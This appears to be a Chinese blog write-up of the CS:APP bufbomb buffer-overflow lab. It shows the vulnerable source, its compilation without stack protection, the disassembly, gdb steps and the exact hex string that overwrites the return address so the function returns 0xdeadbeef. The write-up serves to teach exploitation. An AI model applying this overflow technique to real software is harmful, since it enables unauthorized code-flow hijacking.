jianzaixian
jianzaixian

缓冲区溢出实验(bufbomb)

1. 获得bufbomb.c
/* code for bufbomb.c */
C语言: 高亮代码由发芽网提供
01 /* Bomb program that is solved using a buffer overflow attack */
02
03 #include
04 #include
05 #include
06
07 /* Like gets, except that characters are typed as pairs of hex digits.
08    Nondigit characters are ignored.  Stops when encounters newline */
09 char * getxs( char * dest)
10 {
11     int c;
12     int even = 1; /* Have read even number of digits */
13     int otherd = 0; /* Other hex digit of pair */
14     char *sp = dest;
15     while (( c = getchar()) != EOF && c != '\n') {
16     if ( isxdigit( c)) {
17         int val;
18         if ( '0' <= c && c <= '9')
19         val = c - '0';
20         else if ( 'A' <= c && c <= 'F')
21         val = c - 'A' + 10;
22         else
23         val = c - 'a' + 10;
24         if ( even) {
25         otherd = val;
26         even = 0;
27         } else {
28         *sp ++ = otherd * 16 + val;
29         even = 1;
30         }
31     }
32     }
33     *sp ++ = '\0';
34     return dest;
35 }
36
37 /* $begin getbuf-c */
38 int getbuf()
39 {
40     char buf [ 12 ];
41     getxs( buf);
42     return 1;
43 }
44
45 void test()
46 {
47     int val;
48     int array [ 1 ];
49     printf( "Local variable at %p \n " , array);
50     printf( "Type Hex string:");
51     val = getbuf();
52     printf( "getbuf returned 0x%x \n " , val);
53 }
54 /* $end getbuf-c */
55
56 int main()
57 {
58
59     int buf [ 16 ];
60     /* This little hack is an attempt to get the stack to be in a
61        stable position.  By experiment, found that position of stack
62        varies by one program execution to the next, but only in the low
63        order 23 bits.
64     */
65     int offset = ((( int) buf) & 0x7FFFFF);
66     int * space = ( int *) alloca( offset);
67     * space = 0; /* So that don't get complaint of unused variable */
68     printf( "Added offset 0x%x, should move stack to around %p \n " ,
69        offset , ( char *) buf - offset);
70     test();
71     return 0;
72 }

2. 查看gcc版本
    gcc --version
自GCC-4.1.0之后,就在编译过程中加入了防溢出的随机数验证的堆栈保护机制(默认启用)。
我的gcc版本是4.4.3,显然默认启用了堆栈保护机制,故编译bufbomb.c时需要关闭堆栈保护机制。

3. 关闭堆栈保护机制进行编译(使用-fno-stack-protector编译选项)。
   gcc -o bufbomb bufbomb.c -fno-stack-protector
切记,不要使用优化选项,如-O2等。否则得不到后面的结果。

4. 反汇编bufbomb
    objdump -d bufbomb > NP_bufbomb.s
使用NP_bufbomb.s是为了表明No stack Protector, :-)
/* code for NP_bufbomb.s */
GAS语言: 高亮代码由发芽网提供
bufbomb:     file format elf32 - i386

Disassembly of section .init :

08048328 < _init > :
8048328:    55                       push   %ebp
8048329:    89 e5                    mov    %esp , %ebp
804832 b:    53                       push   %ebx
804832 c:    83 ec 04                 sub    $0x4 , %esp
804832 f:    e8 00 00 00 00           call   8048334 < _init + 0xc >
8048334:    5b                       pop    %ebx
8048335:    81 c3 c0 1 c 00 00        add    $0x1cc0 , %ebx
804833 b:    8b 93 fc ff ff ff        mov    - 0x4( %ebx ), %edx
8048341:    85 d2                    test   %edx , %edx
8048343:    74 05                    je     804834a < _init + 0x22 >
8048345:    e8 2 e 00 00 00           call   8048378 < __gmon_start__@plt >
804834 a:    e8 01 01 00 00           call   8048450 < frame_dummy >
804834 f:    e8 3 c 03 00 00           call   8048690 < __do_global_ctors_aux >
8048354:    58                       pop    %eax
8048355:    5b                       pop    %ebx
8048356:    c9                       leave 
8048357 :    c3                       ret   

Disassembly of section .plt :

08048358 < getchar@plt - 0x10 > :
8048358:    ff 35 f8 9 f 04 08        pushl  0x8049ff8
804835 e:    ff 25 fc 9 f 04 08        jmp    * 0x8049ffc
8048364:    00 00                    add    %al ,( %eax)
    ...

08048368 < getchar@plt > :
8048368:    ff 25 00 a0 04 08        jmp    * 0x804a000
804836 e:    68 00 00 00 00           push   $0x0
8048373:    e9 e0 ff ff ff           jmp    8048358 < _init + 0x30 >

08048378 < __gmon_start__@plt > :
8048378:    ff 25 04 a0 04 08        jmp    * 0x804a004
804837 e:    68 08 00 00 00           push   $0x8
8048383:    e9 d0 ff ff ff           jmp    8048358 < _init + 0x30 >

08048388 < __libc_start_main@plt > :
8048388:    ff 25 08 a0 04 08        jmp    * 0x804a008
804838 e:    68 10 00 00 00           push   $0x10
8048393:    e9 c0 ff ff ff           jmp    8048358 < _init + 0x30 >

08048398 < __ctype_b_loc@plt > :
8048398:    ff 25 0 c a0 04 08        jmp    * 0x804a00c
804839 e:    68 18 00 00 00           push   $0x18
80483 a3:    e9 b0 ff ff ff           jmp    8048358 < _init + 0x30 >

080483 a8 < printf@plt > :
80483 a8:    ff 25 10 a0 04 08        jmp    * 0x804a010
80483 ae:    68 20 00 00 00           push   $0x20
80483 b3:    e9 a0 ff ff ff           jmp    8048358 < _init + 0x30 >

Disassembly of section .text :

080483 c0 < _start > :
80483 c0:    31 ed                    xor    %ebp , %ebp
80483 c2:    5 e                       pop    %esi
80483 c3:    89 e1                    mov    %esp , %ecx
80483 c5:    83 e4 f0                 and    $0xfffffff0 , %esp
80483 c8:    50                       push   %eax
80483 c9:    54                       push   %esp
80483 ca:    52                       push   %edx
80483 cb:    68 20 86 04 08           push   $0x8048620
80483 d0:    68 30 86 04 08           push   $0x8048630
80483 d5:    51                       push   %ecx
80483 d6:    56                       push   %esi
80483 d7:    68 a0 85 04 08           push   $0x80485a0
80483 dc:    e8 a7 ff ff ff           call   8048388 < __libc_start_main@plt >
80483 e1:    f4                       hlt   
80483 e2 :    90                       nop
80483 e3:    90                       nop
80483 e4:    90                       nop
80483 e5:    90                       nop
80483 e6:    90                       nop
80483 e7:    90                       nop
80483 e8:    90                       nop
80483 e9:    90                       nop
80483 ea:    90                       nop
80483 eb:    90                       nop
80483 ec:    90                       nop
80483 ed:    90                       nop
80483 ee:    90                       nop
80483 ef:    90                       nop

080483 f0 < __do_global_dtors_aux > :
80483 f0:    55                       push   %ebp
80483 f1:    89 e5                    mov    %esp , %ebp
80483 f3:    53                       push   %ebx
80483 f4:    83 ec 04                 sub    $0x4 , %esp
80483 f7:    80 3 d 1 c a0 04 08 00     cmpb   $0x0 , 0x804a01c
80483 fe:    75 3 f                    jne    804843f < __do_global_dtors_aux + 0x4f >
8048400:    a1 20 a0 04 08           mov    0x804a020 , %eax
8048405:    bb 18 9 f 04 08           mov    $0x8049f18 , %ebx
804840 a:    81 eb 14 9 f 04 08        sub    $0x8049f14 , %ebx
8048410:    c1 fb 02                 sar    $0x2 , %ebx
8048413:    83 eb 01                 sub    $0x1 , %ebx
8048416:    39 d8                    cmp    %ebx , %eax
8048418:    73 1 e                    jae    8048438 < __do_global_dtors_aux + 0x48 >
804841 a:    8 d b6 00 00 00 00        lea    0x0( %esi ), %esi
8048420:    83 c0 01                 add    $0x1 , %eax
8048423:    a3 20 a0 04 08           mov    %eax , 0x804a020
8048428:    ff 14 85 14 9 f 04 08     call   * 0x8049f14 (, %eax , 4)
804842 f:    a1 20 a0 04 08           mov    0x804a020 , %eax
8048434:    39 d8                    cmp    %ebx , %eax
8048436:    72 e8                    jb     8048420 < __do_global_dtors_aux + 0x30 >
8048438:    c6 05 1 c a0 04 08 01     movb   $0x1 , 0x804a01c
804843 f:    83 c4 04                 add    $0x4 , %esp
8048442:    5b                       pop    %ebx
8048443:    5 d                       pop    %ebp
8048444:    c3                       ret   
8048445 :    8 d 74 26 00              lea    0x0( %esi , %eiz , 1 ), %esi
8048449:    8 d bc 27 00 00 00 00     lea    0x0( %edi , %eiz , 1 ), %edi

08048450 < frame_dummy > :
8048450:    55                       push   %ebp
8048451:    89 e5                    mov    %esp , %ebp
8048453:    83 ec 18                 sub    $0x18 , %esp
8048456:    a1 1 c 9 f 04 08           mov    0x8049f1c , %eax
804845 b:    85 c0                    test   %eax , %eax
804845 d:    74 12                    je     8048471 < frame_dummy + 0x21 >
804845 f:    b8 00 00 00 00           mov    $0x0 , %eax
8048464:    85 c0                    test   %eax , %eax
8048466:    74 09                    je     8048471 < frame_dummy + 0x21 >
8048468:    c7 04 24 1 c 9 f 04 08     movl   $0x8049f1c ,( %esp)
804846 f:    ff d0                    call   * %eax
8048471:    c9                       leave 
8048472 :    c3                       ret   
8048473 :    90                       nop

08048474 < getxs > :
8048474:    55                       push   %ebp
8048475:    89 e5                    mov    %esp , %ebp
8048477:    83 ec 28                 sub    $0x28 , %esp
804847 a:    c7 45 e8 01 00 00 00     movl   $0x1 ,- 0x18( %ebp)
8048481:    c7 45 ec 00 00 00 00     movl   $0x0 ,- 0x14( %ebp)
8048488:    8b 45 08                 mov    0x8( %ebp ), %eax
804848 b:    89 45 f0                 mov    %eax ,- 0x10( %ebp)
804848 e:    e9 89 00 00 00           jmp    804851c < getxs + 0xa8 >
8048493:    e8 00 ff ff ff           call   8048398 < __ctype_b_loc@plt >
8048498:    8b 00                    mov    ( %eax ), %eax
804849 a:    8b 55 e4                 mov    - 0x1c( %ebp ), %edx
804849 d:    01 d2                    add    %edx , %edx
804849 f:    01 d0                    add    %edx , %eax
80484 a1:    0 f b7 00                 movzwl ( %eax ), %eax
80484 a4:    0 f b7 c0                 movzwl %ax , %eax
80484 a7:    25 00 10 00 00           and    $0x1000 , %eax
80484 ac:    85 c0                    test   %eax , %eax
80484 ae:    74 6 c                    je     804851c < getxs + 0xa8 >
80484 b0:    83 7 d e4 2 f              cmpl   $0x2f ,- 0x1c( %ebp)
80484 b4:    7 e 11                    jle    80484c7 < getxs + 0x53 >
80484 b6:    83 7 d e4 39              cmpl   $0x39 ,- 0x1c( %ebp)
80484 ba:    7 f 0b                    jg     80484c7 < getxs + 0x53 >
80484 bc:    8b 45 e4                 mov    - 0x1c( %ebp ), %eax
80484 bf:    83 e8 30                 sub    $0x30 , %eax
80484 c2:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80484 c5:    eb 20                    jmp    80484e7 < getxs + 0x73 >
80484 c7:    83 7 d e4 40              cmpl   $0x40 ,- 0x1c( %ebp)
80484 cb:    7 e 11                    jle    80484de < getxs + 0x6a >
80484 cd:    83 7 d e4 46              cmpl   $0x46 ,- 0x1c( %ebp)
80484 d1:    7 f 0b                    jg     80484de < getxs + 0x6a >
80484 d3:    8b 45 e4                 mov    - 0x1c( %ebp ), %eax
80484 d6:    83 e8 37                 sub    $0x37 , %eax
80484 d9:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80484 dc:    eb 09                    jmp    80484e7 < getxs + 0x73 >
80484 de:    8b 45 e4                 mov    - 0x1c( %ebp ), %eax
80484 e1:    83 e8 57                 sub    $0x57 , %eax
80484 e4:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80484 e7:    83 7 d e8 00              cmpl   $0x0 ,- 0x18( %ebp)
80484 eb:    74 0 f                    je     80484fc < getxs + 0x88 >
80484 ed:    8b 45 f4                 mov    - 0xc( %ebp ), %eax
80484 f0:    89 45 ec                 mov    %eax ,- 0x14( %ebp)
80484 f3:    c7 45 e8 00 00 00 00     movl   $0x0 ,- 0x18( %ebp)
80484 fa:    eb 20                    jmp    804851c < getxs + 0xa8 >
80484 fc:    8b 45 ec                 mov    - 0x14( %ebp ), %eax
80484 ff:    89 c2                    mov    %eax , %edx
8048501:    c1 e2 04                 shl    $0x4 , %edx
8048504:    8b 45 f4                 mov    - 0xc( %ebp ), %eax
8048507:    8 d 04 02                 lea    ( %edx , %eax , 1 ), %eax
804850 a:    89 c2                    mov    %eax , %edx
804850 c:    8b 45 f0                 mov    - 0x10( %ebp ), %eax
804850 f:    88 10                    mov    %dl ,( %eax)
8048511:    83 45 f0 01              addl   $0x1 ,- 0x10( %ebp)
8048515:    c7 45 e8 01 00 00 00     movl   $0x1 ,- 0x18( %ebp)
804851 c:    e8 47 fe ff ff           call   8048368 < getchar@plt >
8048521:    89 45 e4                 mov    %eax ,- 0x1c( %ebp)
8048524:    83 7 d e4 ff              cmpl   $0xffffffff ,- 0x1c( %ebp)
8048528:    74 0 a                    je     8048534 < getxs + 0xc0 >
804852 a:    83 7 d e4 0 a              cmpl   $0xa ,- 0x1c( %ebp)
804852 e:    0 f 85 5 f ff ff ff        jne    8048493 < getxs + 0x1f >
8048534:    8b 45 f0                 mov    - 0x10( %ebp ), %eax
8048537:    c6 00 00                 movb   $0x0 ,( %eax)
804853 a:    83 45 f0 01              addl   $0x1 ,- 0x10( %ebp)
804853 e:    8b 45 08                 mov    0x8( %ebp ), %eax
8048541:    c9                       leave 
8048542 :    c3                       ret   

08048543 < getbuf >:
8048543:    55                       push   %ebp
8048544:    89 e5                    mov    %esp , %ebp
8048546:    83 ec 28                 sub    $0x28 , %esp
8048549:    8 d 45 ec                 lea    - 0x14( %ebp ), %eax
804854 c:    89 04 24                 mov    %eax ,( %esp)
804854 f:    e8 20 ff ff ff           call   8048474 < getxs >
8048554:    b8 01 00 00 00           mov    $0x1 , %eax
8048559:    c9                       leave 
804855 a :    c3                       ret   

0804855b < test >:
804855 b:    55                       push   %ebp
804855 c:    89 e5                    mov    %esp , %ebp
804855 e:    83 ec 28                 sub    $0x28 , %esp
8048561:    b8 e0 86 04 08           mov    $0x80486e0 , %eax
8048566:    8 d 55 f0                 lea    - 0x10( %ebp ), %edx
8048569:    89 54 24 04              mov    %edx , 0x4( %esp)
804856 d:    89 04 24                 mov    %eax ,( %esp)
8048570:    e8 33 fe ff ff           call   80483a8 < printf@plt >
8048575:    b8 f6 86 04 08           mov    $0x80486f6 , %eax
804857 a:    89 04 24                 mov    %eax ,( %esp)
804857 d:    e8 26 fe ff ff           call   80483a8 < printf@plt >
8048582:    e8 bc ff ff ff           call   8048543 < getbuf >
8048587:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
804858 a:    b8 07 87 04 08           mov    $0x8048707 , %eax
804858 f:    8b 55 f4                 mov    - 0xc( %ebp ), %edx
8048592:    89 54 24 04              mov    %edx , 0x4( %esp)
8048596:    89 04 24                 mov    %eax ,( %esp)
8048599:    e8 0 a fe ff ff           call   80483a8 < printf@plt >
804859 e:    c9                       leave 
804859 f :    c3                       ret   

080485a0 < main >:
80485 a0:    8 d 4 c 24 04              lea    0x4( %esp ), %ecx
80485 a4:    83 e4 f0                 and    $0xfffffff0 , %esp
80485 a7:    ff 71 fc                 pushl  - 0x4( %ecx)
80485 aa:    55                       push   %ebp
80485 ab:    89 e5                    mov    %esp , %ebp
80485 ad:    51                       push   %ecx
80485 ae:    83 ec 64                 sub    $0x64 , %esp
80485 b1:    8 d 45 b0                 lea    - 0x50( %ebp ), %eax
80485 b4:    25 ff ff 7 f 00           and    $0x7fffff , %eax
80485 b9:    89 45 f0                 mov    %eax ,- 0x10( %ebp)
80485 bc:    8b 45 f0                 mov    - 0x10( %ebp ), %eax
80485 bf:    83 c0 0 f                 add    $0xf , %eax
80485 c2:    83 c0 0 f                 add    $0xf , %eax
80485 c5:    c1 e8 04                 shr    $0x4 , %eax
80485 c8:    c1 e0 04                 shl    $0x4 , %eax
80485 cb:    29 c4                    sub    %eax , %esp
80485 cd:    8 d 44 24 0 c              lea    0xc( %esp ), %eax
80485 d1:    83 c0 0 f                 add    $0xf , %eax
80485 d4:    c1 e8 04                 shr    $0x4 , %eax
80485 d7:    c1 e0 04                 shl    $0x4 , %eax
80485 da:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80485 dd:    8b 45 f4                 mov    - 0xc( %ebp ), %eax
80485 e0:    c7 00 00 00 00 00        movl   $0x0 ,( %eax)
80485 e6:    8 d 45 b0                 lea    - 0x50( %ebp ), %eax
80485 e9:    8b 55 f0                 mov    - 0x10( %ebp ), %edx
80485 ec:    f7 da                    neg    %edx
80485 ee:    8 d 14 10                 lea    ( %eax , %edx , 1 ), %edx
80485 f1:    b8 20 87 04 08           mov    $0x8048720 , %eax
80485 f6:    89 54 24 08              mov    %edx , 0x8( %esp)
80485 fa:    8b 55 f0                 mov    - 0x10( %ebp ), %edx
80485 fd:    89 54 24 04              mov    %edx , 0x4( %esp)
8048601:    89 04 24                 mov    %eax ,( %esp)
8048604:    e8 9 f fd ff ff           call   80483a8 < printf@plt >
8048609:    e8 4 d ff ff ff           call   804855b < test >
804860 e:    b8 00 00 00 00           mov    $0x0 , %eax
8048613:    8b 4 d fc                 mov    - 0x4( %ebp ), %ecx
8048616:    c9                       leave 
8048617 :    8 d 61 fc                 lea    - 0x4( %ecx ), %esp
804861 a:    c3                       ret   
804861b :    90                       nop
804861 c:    90                       nop
804861 d:    90                       nop
804861 e:    90                       nop
804861 f:    90                       nop

08048620 < __libc_csu_fini > :
8048620:    55                       push   %ebp
8048621:    89 e5                    mov    %esp , %ebp
8048623:    5 d                       pop    %ebp
8048624:    c3                       ret   
8048625 :    8 d 74 26 00              lea    0x0( %esi , %eiz , 1 ), %esi
8048629:    8 d bc 27 00 00 00 00     lea    0x0( %edi , %eiz , 1 ), %edi

08048630 < __libc_csu_init > :
8048630:    55                       push   %ebp
8048631:    89 e5                    mov    %esp , %ebp
8048633:    57                       push   %edi
8048634:    56                       push   %esi
8048635:    53                       push   %ebx
8048636:    e8 4 f 00 00 00           call   804868a < __i686.get_pc_thunk.bx >
804863 b:    81 c3 b9 19 00 00        add    $0x19b9 , %ebx
8048641:    83 ec 1 c                 sub    $0x1c , %esp
8048644:    e8 df fc ff ff           call   8048328 < _init >
8048649:    8 d bb 18 ff ff ff        lea    - 0xe8( %ebx ), %edi
804864 f:    8 d 83 18 ff ff ff        lea    - 0xe8( %ebx ), %eax
8048655:    29 c7                    sub    %eax , %edi
8048657:    c1 ff 02                 sar    $0x2 , %edi
804865 a:    85 ff                    test   %edi , %edi
804865 c:    74 24                    je     8048682 < __libc_csu_init + 0x52 >
804865 e:    31 f6                    xor    %esi , %esi
8048660:    8b 45 10                 mov    0x10( %ebp ), %eax
8048663:    89 44 24 08              mov    %eax , 0x8( %esp)
8048667:    8b 45 0 c                 mov    0xc( %ebp ), %eax
804866 a:    89 44 24 04              mov    %eax , 0x4( %esp)
804866 e:    8b 45 08                 mov    0x8( %ebp ), %eax
8048671:    89 04 24                 mov    %eax ,( %esp)
8048674:    ff 94 b3 18 ff ff ff     call   *- 0xe8( %ebx , %esi , 4)
804867 b:    83 c6 01                 add    $0x1 , %esi
804867 e:    39 fe                    cmp    %edi , %esi
8048680:    72 de                    jb     8048660 < __libc_csu_init + 0x30 >
8048682:    83 c4 1 c                 add    $0x1c , %esp
8048685:    5b                       pop    %ebx
8048686:    5 e                       pop    %esi
8048687:    5 f                       pop    %edi
8048688:    5 d                       pop    %ebp
8048689:    c3                       ret   

0804868a < __i686.get_pc_thunk.bx >:
804868 a:    8b 1 c 24                 mov    ( %esp ), %ebx
804868 d:    c3                       ret   
804868 e :    90                       nop
804868 f:    90                       nop

08048690 < __do_global_ctors_aux > :
8048690:    55                       push   %ebp
8048691:    89 e5                    mov    %esp , %ebp
8048693:    53                       push   %ebx
8048694:    83 ec 04                 sub    $0x4 , %esp
8048697:    a1 0 c 9 f 04 08           mov    0x8049f0c , %eax
804869 c:    83 f8 ff                 cmp    $0xffffffff , %eax
804869 f:    74 13                    je     80486b4 < __do_global_ctors_aux + 0x24 >
80486 a1:    bb 0 c 9 f 04 08           mov    $0x8049f0c , %ebx
80486 a6:    66 90                    xchg   %ax , %ax
80486 a8:    83 eb 04                 sub    $0x4 , %ebx
80486 ab:    ff d0                    call   * %eax
80486 ad:    8b 03                    mov    ( %ebx ), %eax
80486 af:    83 f8 ff                 cmp    $0xffffffff , %eax
80486 b2:    75 f4                    jne    80486a8 < __do_global_ctors_aux + 0x18 >
80486 b4:    83 c4 04                 add    $0x4 , %esp
80486 b7:    5b                       pop    %ebx
80486 b8:    5 d                       pop    %ebp
80486 b9:    c3                       ret   
80486 ba :    90                       nop
80486 bb:    90                       nop

Disassembly of section .fini :

080486 bc < _fini > :
80486 bc:    55                       push   %ebp
80486 bd:    89 e5                    mov    %esp , %ebp
80486 bf:    53                       push   %ebx
80486 c0:    83 ec 04                 sub    $0x4 , %esp
80486 c3:    e8 00 00 00 00           call   80486c8 < _fini + 0xc >
80486 c8:    5b                       pop    %ebx
80486 c9:    81 c3 2 c 19 00 00        add    $0x192c , %ebx
80486 cf:    e8 1 c fd ff ff           call   80483f0 < __do_global_dtors_aux >
80486 d4:    59                       pop    %ecx
80486 d5:    5b                       pop    %ebx
80486 d6:    c9                       leave 
80486 d7 :    c3                       ret

5. 由于我们的任务是,只简单地对提示符输入一个适当的十六进制字符串,就使getbuf对test返回-559038737(0xdeadbeef)。
所以我们输入的串只要覆盖到val所在的内存单元的位置即可。

1. 通过分析NP_bufbomb.s得到各个过程的栈帧布局,getbuf的返回地址,test中call printf的地址和"getbuf returned 0x%x\n"的地址。
2. 通过使用gdb调试bufbomb得到数组buf的起始地址(注意不是buf的地址!)和test的栈帧地址。
注: 函数参数的地址可根据调用函数前的入栈情况获得(汇编调用C标准库函数都是通过栈来传递参数的);
    栈帧的地址可通过在调试程序时的相应位置使用print /x $ebp获得。

执行getxs时内存中各个过程的栈帧布局
(仅仅画出了关键的test,getbuf以及getxs的栈帧布局,以及一些必要的单元里的内容):
/* there is a picture of stack frame */
 

6. 分析完毕得到输入串,运行bufbomb,并输入数据:
01 02 03 04 05 06 07 08 09 10 11 12 01 02 03 04 05 06 07 08 c8 ff 7f bf 99 85 04 08 07 87 04 08 ef be ad de

运行结果:
有图由真相
/* there is a picture of result */
 

关于输入数据的解释:

前12个(01 02 03 04 05 06 07 08 09 10 11 12)存到buf[0]~buf[11]中。这里的数组buf是getbuf中的,而不是main中的!    

接着的8个(01 02 03 04 05 06 07 08)存到编译器为数组buf多开辟的8个字节中(一般情况下,编译器总是开辟比需要的多一点的空间)。

接下来的c8 ff 7f bf,是test的栈帧指针(0xbf7fffc8)。

然后的99 85 04 08,是新的getbuf的返回地址也是test中最后一个call printf的地址(0x08048599)。其实只要跳过对val的赋值过程即可,这个值不唯一,也可以是0x0804858a。(这个地址跳过了程序用getbuf的返回值0x1修改栈中val所在内存里的值,从而使printf的参数栈中val的内容是我们所输入的0xdeadbeef,当然存储"getbuf returned 0x%x\n"地址的内存单元还是用原值覆盖)

最后的ef be ad de,是我们要得到的输出值(0xdeadbeef)。



!!!一些强调:

自GCC-4.1.0之后,就在编译过程中加入了防溢出的随机数验证机制,在%gs:0x14 中保存一个随机数,用此进行比对,验证溢出与否。同时GCC-4.1.0之后还加入了与溢出有关的几个编译选项,以此控制是否添加溢出验证:
-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码。
-fstack-protector-all:启用堆栈保护,为所有函数插入保护代码。
-fno-stack-protector:禁用堆栈保护。

输入值必须为两个数字或字母(十六进制允许范围内)一组。(注意源程序中even number,偶数的意思)

注意1:注意输入值与其所在内存中的对应关系(我们输入的值是从低到高进入内存的,按字节(由char buf[12]和getxs决定))!,根据getxs可知,输入的值都会被作为十六进制,如bf被作为0xbf

注意2:前20个输入,只要是两个一组即可。(也就是前20个输入只要符合getxs函数的要求即可!)


切记切记,该实验是非常依赖机器和编译选项的!
自己实验时,最要注意的是关闭堆栈保护机制(不关闭堆栈保护机制,在gdb中得到结果,不算本事,我几分钟就可以搞定!)。
还有就是一定要使用"objdump -d bufbomb > bufbomb.s"得到bufbomb的反汇编代码。
通过分析bufbomb.s得到栈帧的布局,以及一些必要的地址数据(getbuf的返回地址(需要修改以跳过将getbuf的返回值放到堆栈的指令)和"getbuf returned 0x%x\n"的地址)。再者就是要通过gdb获得数组buf的起始地址(注意不是buf的地址!)和test的栈帧地址。



思维扩展:
1. 关于gcc堆栈保护机制,以及%gs:0x14内容的随机性和不可访问性!

2. 关于对关闭和启用gcc堆栈保护机制对生成代码的影响。

3. 如何找出程序中潜在的缓冲区溢出漏洞(现实中往往得不到源程序)。

4. 如何利用程序中的缓冲区溢出漏洞,做一些高级攻击,如植入恶意代码等。

5. 如何防止程序中出现缓冲区溢出漏洞。


最后引用CSAPP里的原话:“我们不能原谅任何用这种或其他任何方法来获得对系统的未被授权的访问。未经许可闯入计算机系统与闯入一幢建筑是一样的——犯罪行为,即使犯罪者并没有恶意。”

你可能感兴趣的:(计算机基础)

  • 不要再走弯路了2025最全的黑客入门学习路线在这 渗透代老师 学习网络安全web安全网络python
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包在大多数的思维里总觉得[学习]得先收集资料、学习编程、学习计算机基础,这样不是不可以,但是这样学效率太低了!你要知道网络安全是一门技术,任何技术的学习一定是以实践为主的。也就是说很多的理论知识其实是可以在实践中去验证拓展的,这样学习比起你啃原理、啃书本要好理解很多。所以想要学习网络安全选对正确的学习方法很重要,这可以帮你少走很多弯路。
  • 2023计算机组成原理考研知识点:哈佛结构 计算机考研 考研资料计算机网络哈佛结构数据结构
    2023年计算机考研初试科目一般分四门,基本都考政治、英语一、数学一和计算机基础(计算机综合),报考院校不同专业课考试内容一般不同,建议考生下正式备考2023年研考时先确认报考院校计算机研招科目内容,避免无效备考。计算机组成原理:哈佛结构将指令和数据放在两个独立的存储器,允许在一个机器周期内同时获得指令和操作数,提高了执行速度。2023年计算机组成原理复习题示例(来源于网络,如有侵权,请联系删除)
  • 新手如何成为一名顶尖黑客?只需这十二个步骤轻松入门! 网络安全淼叔 黑客渗透测试白帽黑客网络安全副业
    成为一名黑客的过程涉及不断学习和实践技术,既要掌握基础的计算机知识,也要具备足够的安全意识和道德责任感。以下是成为一名黑客的12个基本步骤,为小白提供系统的入门指导。对于从来没有接触过黑客的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。1.了解计算机基础要成为一名黑客,首先需要了解计算机硬件、操作系统和网络的基础。你需要理解计算机如何处
  • 新手如何成为一名顶尖黑客?只需这十二个步骤轻松入门! 网络安全淼叔 黑客渗透测试白帽黑客网络安全副业
    成为一名黑客的过程涉及不断学习和实践技术,既要掌握基础的计算机知识,也要具备足够的安全意识和道德责任感。以下是成为一名黑客的12个基本步骤,为小白提供系统的入门指导。对于从来没有接触过黑客的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。1.了解计算机基础要成为一名黑客,首先需要了解计算机硬件、操作系统和网络的基础。你需要理解计算机如何处
  • 计算机组成原理知识点精汇(一)计算机基础知识 A.sir啊 计算机组成原理计算机组成原理冯诺依曼硬件架构CPU
    一、冯·诺伊曼计算机的特点(1)计算机由运算器、控制器、存储器、输人设备和输出设备五大部件组成。(2)程序和数据存放在同一存储器中,并按地址寻访。(3)指令和数据均采用二进制运算。(4)指令由操作码和地址码组成,操作码用来表示操作的类型,地址码用来表示操作数和操作结果的地址。(5)机器以运算器为核心,输人输出设备与存储器之间的数据传送都要通过运算器。二、机器字长CPU一次操作中能够处理的数据的位数
  • CCF-GESP Python一级考试全解析:网络协议+编程技能双突破 奕澄羽邦 python网络协议开发语言
    第一章CCF-GESP考试全景透视1.1认证体系权威性中国计算机学会(CCF)主办的GESP编程能力等级认证,是国内首个面向青少年的编程能力标准化评估体系。Python一级考试作为入门级认证,主要考察考生对计算机基础逻辑、编程工具使用及网络基础概念的掌握程度,证书受教育部认可,为后续人工智能、大数据等领域学习奠定基石。1.2考试内容三维度编程语言:Python语法基础(变量、循环、条件判断)、函数
  • 软考初级程序员知识点汇总 水瓶丫头站住 考试软考程序员考试
    以下是计算机技术与软件专业技术资格(水平)考试(简称“软考”)中程序员(初级)考试的核心知识点汇总,涵盖考试大纲的主要方向,帮助你系统复习:一、计算机基础计算机组成与体系结构计算机五大部件:运算器、控制器、存储器、输入设备、输出设备进制转换:二进制、八进制、十进制、十六进制的相互转换数据表示:原码、反码、补码、浮点数表示、ASCII码、汉字编码(GB2312、Unicode)存储单位:位(bit)
  • 专业 英语 程序员爱德华 英语专业英语
    文章目录一、计算机1.计算机基础(1)计算机组成原理(2)计算机网络(3)数据库(4)编译原理(5)离散数学2.软件开发(1)编程词汇(2)开发术语(3)Linux(4)软件3.就业领域(1)职场(2)芯片(3)自动驾驶(4)嵌入式硬件4.深度学习(1)论文(2)深度学习DL(3)计算机视觉CV(4)自然语言处理NLP(5)推荐系统(6)计算机图形学二、数学三、机械、材料四、医药五、英美计量单位一
  • 最全Android面试题大集合(Android、Java、计算机基础、设计模式)持续更新 Mettee Android开发笔记面试Androidjava计算机基础设计模式
    写在前边最近在准备面试,费了很大劲收集整理了面试题,包括Android基础、Android高级、Java、计算机基础、设计模式、以及一些常见的问题。所有题目来源于网络,包含了掘金,简书以及其他平台的文章。面经等等。有大厂也有小公司,有基础也有高级,文章最后附上了链接,希望能帮到有需要的人,做好充足的准备,找到满意的工作。Android基础:1.四大组件及生命周期;2.安卓子线程是否能更新UI,如果
  • 新手如何成为一名顶尖黑客?只需这十二个步骤轻松入门! 网络安全淼叔 服务器负载均衡网络python网络安全
    成为一名黑客的过程涉及不断学习和实践技术,既要掌握基础的计算机知识,也要具备足够的安全意识和道德责任感。以下是成为一名黑客的12个基本步骤,为小白提供系统的入门指导。对于从来没有接触过黑客的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。1.了解计算机基础要成为一名黑客,首先需要了解计算机硬件、操作系统和网络的基础。你需要理解计算机如何处
  • 【Web前端开发】---web简介 爱学习的小何同学! 前端
    1、前端开发能干什么能干:网页、小程序(例如:微信小程序、抖音小程序),数据可视化前端工程师不仅可以开发上面所说的东西,而且也可以开发:服务器、客户端。2、计算机基础计算机由硬件与软件构成。所谓的硬件就是能看得见、摸得着的一些零部件。比如:CPU、内存、硬盘、键盘、鼠标、音箱、显示器。所谓的软件就是看得见、摸不着的东西。软件由系统软件和应用软件构成。系统软件:Windows、Linux、Max、H
  • 计算机基础面试(数据结构) 熊假猫威XStar 面试数据结构职场和发展
